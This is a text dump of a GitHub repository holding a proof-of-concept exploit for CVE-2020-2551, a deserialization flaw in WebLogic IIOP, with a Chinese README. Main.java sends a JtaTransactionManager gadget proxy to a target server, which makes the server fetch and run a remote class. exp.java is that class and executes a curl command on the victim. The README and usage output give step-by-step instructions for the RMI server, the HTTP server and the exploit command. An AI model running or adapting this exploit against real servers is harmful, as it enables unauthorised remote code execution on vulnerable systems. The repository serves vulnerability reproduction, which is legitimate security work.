Repository: Y4er/CVE-2020-2551
Branch: master
Commit: 81ce92ab8def
Files: 12
Total size: 52.5 MB
Directory structure:
gitextract_0f86yukl/
├── .gitignore
├── Makefile
├── README.md
├── build.xml
├── src/
│ ├── META-INF/
│ │ └── MANIFEST.MF
│ ├── com/
│ │ └── payload/
│ │ └── Main.java
│ ├── exp.java
│ └── lib/
│ ├── com.bea.core.repackaged.apache.commons.logging_1.2.1.jar
│ ├── com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar
│ ├── permit-reflect-0.3.jar
│ └── wlfullclient.jar
└── weblogic_CVE_2020_2551.iml
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
# Created by .ignore support plugin (hsz.mobi)
### Java template
# Compiled class file
*.class
# Log file
*.log
# BlueJ files
*.ctxt
# Mobile Tools for Java (J2ME)
.mtj.tmp/
# Package Files #
*.war
*.nar
*.ear
*.zip
*.tar.gz
*.rar
# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
hs_err_pid*
.idea
out
================================================
FILE: Makefile
================================================
all:
ant run
javac src/exp.java
#cd src; sudo python3 -m http.server 80
================================================
FILE: README.md
================================================
## CVE-2020-2551
Weblogic IIOP 反序列化
## 测试环境
Weblogic10.3.6+jdk1.6
[打包好的jar包](https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg) 提取码:a6ob
## 漏洞利用
下载jar包,然后使用marshalsec起一个恶意的RMI服务,本地编译一个exp.java
```java
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
**尽量使用和weblogic相同的jdk版本和依赖库(wlfullclient.jar)编译** 然后本地起一个web服务器
```
python -m http.server --bind 0.0.0.0 80
```
命令行运行jar包
```
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
```
实际效果如图
## 已知问题
很多小伙伴都说复现不成功,看了网上的一些文章发现IIOP存在nat模式的问题,今天发现先知上有了 https://xz.aliyun.com/t/7498 各位自行移步。
## 参考
https://y4er.com/post/weblogic-cve-2020-2551/
================================================
FILE: build.xml
================================================
<project name="weblogic_CVE_2020_2551" basedir=".">
<property name="lib.dir" value="src/lib"/>
<property name="src.dir" value="src"/>
<property name="build.dir" value="build"/>
<property name="classes.dir" value="${build.dir}/classes"/>
<property name="jar.dir" value="${build.dir}/jar"/>
<property name="jar.dir.tmp" value="${build.dir}/jar.tmp"/>
<property name="main-class" value="com/payload/Main"/>
<path id="classpath">
<fileset dir="${lib.dir}" includes="**/*.jar"/>
</path>
<target name="clean">
<delete dir="${build.dir}"/>
</target>
<target name="compile">
<mkdir dir="${classes.dir}"/>
<javac srcdir="${src.dir}" target="1.6" source="1.6" destdir="build/classes" classpathref="classpath"/>
</target>
<target name="jar" depends="compile">
<mkdir dir="${jar.dir}"/>
<jar destfile="${jar.dir}/${ant.project.name}.jar" basedir="${classes.dir}">
<manifest>
<attribute name="Main-Class" value="com/payload/Main" />
</manifest>
<zipgroupfileset dir="src/lib" />
</jar>
</target>
<target name="run" depends="jar">
<java jar="${jar.dir}/${ant.project.name}.jar" fork="true"/>
</target>
</project>
================================================
FILE: src/META-INF/MANIFEST.MF
================================================
Manifest-Version: 1.0
Main-Class: com.payload.Main
================================================
FILE: src/com/payload/Main.java
================================================
package com.payload;
import com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager;
import com.nqzero.permit.Permit;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.lang.reflect.*;
import java.rmi.Remote;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;
public class Main {
public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
public static void main(String[] args) {
try {
if (args.length != 3) {
System.out.println("java -jar IIOP_CVE_2020_2551.jar rhost rport rmiurl");
System.out.println("java -jar IIOP_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp");
System.out.println("先起一个RMIRefServer服务");
System.out.println("java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer \"http://172.16.1.1/#exp\" 1099");
System.out.println("jdk1.6\\bin\\javac exp.java 将生成的exp.class放入当前目录");
System.out.println("exp.class目录起一个WEB服务 python3 -m http.server --bind 0.0.0.0 80");
System.out.println("test on weblogic 10.3.6 success!");
System.out.println("welcome to myblog: http://Y4er.com");
System.exit(0);
}
String ip = args[0];
String port = args[1];
String rmiurl = args[2];
String rhost = String.format("iiop://%s:%s", ip, port);
Hashtable<String, String> env = new Hashtable<String, String>();
// add wlsserver/server/lib/weblogic.jar to classpath,else will error.
env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
env.put("java.naming.provider.url", rhost);
Context context = new InitialContext(env);
// get Object to Deserialize
JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
jtaTransactionManager.setUserTransactionName(rmiurl);
Remote remote = createMemoitizedProxy(createMap("pwned"+System.nanoTime(), jtaTransactionManager), Remote.class);
context.rebind("Y4er"+System.nanoTime(), remote);
} catch (Exception ex) {
ex.printStackTrace();
System.out.println("------------------------");
System.out.println("----没有回显 自行检测----");
System.out.println("------------------------");
}
}
public static <T> T createMemoitizedProxy(final Map<String, Object> map, final Class<T> iface, final Class<?>... ifaces) throws Exception {
return createProxy(createMemoizedInvocationHandler(map), iface, ifaces);
}
public static InvocationHandler createMemoizedInvocationHandler(final Map<String, Object> map) throws Exception {
return (InvocationHandler) getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
}
public static Constructor<?> getFirstCtor(final String name) throws Exception {
final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
setAccessible(ctor);
return ctor;
}
public static void setAccessible(AccessibleObject member) {
// quiet runtime warnings from JDK9+
Permit.setAccessible(member);
}
public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?>... ifaces) {
final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, ifaces.length + 1);
allIfaces[0] = iface;
if (ifaces.length > 0) {
System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);
}
return iface.cast(Proxy.newProxyInstance(Main.class.getClassLoader(), allIfaces, ih));
}
public static Map<String, Object> createMap(final String key, final Object val) {
final Map<String, Object> map = new HashMap<String, Object>();
map.put(key, val);
return map;
}
}
================================================
FILE: src/exp.java
================================================
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
================================================
FILE: src/lib/wlfullclient.jar
================================================
[File too large to display: 52.5 MB]
================================================
FILE: weblogic_CVE_2020_2551.iml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<module type="JAVA_MODULE" version="4">
<component name="NewModuleRootManager" inherit-compiler-output="true">
<exclude-output />
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
<orderEntry type="library" name="lib" level="project" />
</component>
</module>
gitextract_0f86yukl/ ├── .gitignore ├── Makefile ├── README.md ├── build.xml ├── src/ │ ├── META-INF/ │ │ └── MANIFEST.MF │ ├── com/ │ │ └── payload/ │ │ └── Main.java │ ├── exp.java │ └── lib/ │ ├── com.bea.core.repackaged.apache.commons.logging_1.2.1.jar │ ├── com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar │ ├── permit-reflect-0.3.jar │ └── wlfullclient.jar └── weblogic_CVE_2020_2551.iml
SYMBOL INDEX (10 symbols across 2 files)
FILE: src/com/payload/Main.java
class Main (line 14) | public class Main {
method main (line 18) | public static void main(String[] args) {
method createMemoitizedProxy (line 55) | public static <T> T createMemoitizedProxy(final Map<String, Object> ma...
method createMemoizedInvocationHandler (line 59) | public static InvocationHandler createMemoizedInvocationHandler(final ...
method getFirstCtor (line 63) | public static Constructor<?> getFirstCtor(final String name) throws Ex...
method setAccessible (line 69) | public static void setAccessible(AccessibleObject member) {
method createProxy (line 74) | public static <T> T createProxy(final InvocationHandler ih, final Clas...
method createMap (line 83) | public static Map<String, Object> createMap(final String key, final Ob...
FILE: src/exp.java
class exp (line 5) | public class exp {
method exp (line 7) | public exp() {
Condensed preview — 12 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (9K chars).
[
{
"path": ".gitignore",
"chars": 347,
"preview": "# Created by .ignore support plugin (hsz.mobi)\n### Java template\n# Compiled class file\n*.class\n\n# Log file\n*.log\n\n# Blue"
},
{
"path": "Makefile",
"chars": 75,
"preview": "all:\n\tant run\n\tjavac src/exp.java\n\t#cd src; sudo python3 -m http.server 80\n"
},
{
"path": "README.md",
"chars": 989,
"preview": "## CVE-2020-2551\nWeblogic IIOP 反序列化\n\n## 测试环境\nWeblogic10.3.6+jdk1.6\n\n[打包好的jar包](https://pan.baidu.com/s/1WancKEtKzXDxwWP0"
},
{
"path": "build.xml",
"chars": 1219,
"preview": "<project name=\"weblogic_CVE_2020_2551\" basedir=\".\">\n <property name=\"lib.dir\" value=\"src/lib\"/>\n <property name=\"s"
},
{
"path": "src/META-INF/MANIFEST.MF",
"chars": 52,
"preview": "Manifest-Version: 1.0\nMain-Class: com.payload.Main\n\n"
},
{
"path": "src/com/payload/Main.java",
"chars": 4044,
"preview": "package com.payload;\n\nimport com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager;\nimport com.n"
},
{
"path": "src/exp.java",
"chars": 301,
"preview": "package payload;\n\nimport java.io.IOException;\n\npublic class exp {\n\n public exp() {\n String cmd = \"curl http://"
},
{
"path": "weblogic_CVE_2020_2551.iml",
"chars": 484,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<module type=\"JAVA_MODULE\" version=\"4\">\n <component name=\"NewModuleRootManager\" "
}
]
// ... and 4 more files (download for full content)
About this extraction
This page contains the full source code of the Y4er/CVE-2020-2551 GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 12 files (52.5 MB), approximately 2.4k tokens, and a symbol index with 10 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.